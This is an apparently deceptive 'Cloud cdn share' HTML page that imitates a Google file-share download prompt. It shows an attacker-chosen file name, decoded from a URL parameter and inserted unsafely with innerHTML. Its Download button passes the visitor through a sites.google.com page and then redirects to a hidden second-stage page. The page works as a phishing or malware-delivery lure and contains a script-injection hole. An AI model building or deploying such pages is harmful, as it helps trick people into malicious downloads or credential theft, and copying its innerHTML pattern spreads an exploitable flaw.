<!doctype html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Cloud cdn share</title>
    <link rel="shortcut icon" href="//ssl.gstatic.com/pantheon/images/favicon/default.png">
</head>
<body>

<script type="text/javascript">
    document.addEventListener("DOMContentLoaded", function() {
		var path = window.location.pathname;
		finalUrl = window.location.origin + path.replace(/main.html/ui, 'index.html') + window.location.search;
		
		var url = new URL(location.href);
		var fileName = url.searchParams.get("name") ? atob(url.searchParams.get("name")) : 'Archive.zip';
		
		document.getElementById('file_name').innerHTML = fileName;
		document.getElementById('download').addEventListener('click', function(){
			var newWindow = window.open('https://sites.google.com/view/my-first-qwe/');
			setTimeout(function(){
				newWindow.location = finalUrl;
				window.close();
			}, 3000);
		});
    });
</script>
	<div class="title">File ready: <span id="file_name"></span></div>
	<a href="#" id="download"><span>Download </span></a>
	<style>
		body {
			background-color: #f5f5f5;
		}
		html, body, a {
			display: table;
			height: 100%;
			width: 100%;
			margin: 0;
		}
		.title{
			position:absolute;
			top: 50px;
			text-align:center;
			width:100%;
			font-size: 25px;
			color: #565656;
		}
		#file_name{ 
			font-size: 30px; 
		}
		a {
			display: table-cell;
			text-align: center;
			vertical-align: middle;
			text-decoration: none;
		}
		a span {
			display: block;
			width: 300px;
			height: 120px;
			line-height: 120px;
			background-color: #5cb85c;
			border-color: #4cae4c;
			color: #fff;
			margin: 0 auto;
			font-size: 30px;
			font-family: Tahoma, Arial, Sans-serif, sans-serif;
			-webkit-border-radius: 2px;
			-moz-border-radius: 2px;
			border-radius: 2px;
		}
	</style>
</body>
</html>